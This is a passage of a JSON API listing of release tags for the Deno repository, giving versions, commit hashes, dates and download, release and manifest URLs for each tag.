pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","publi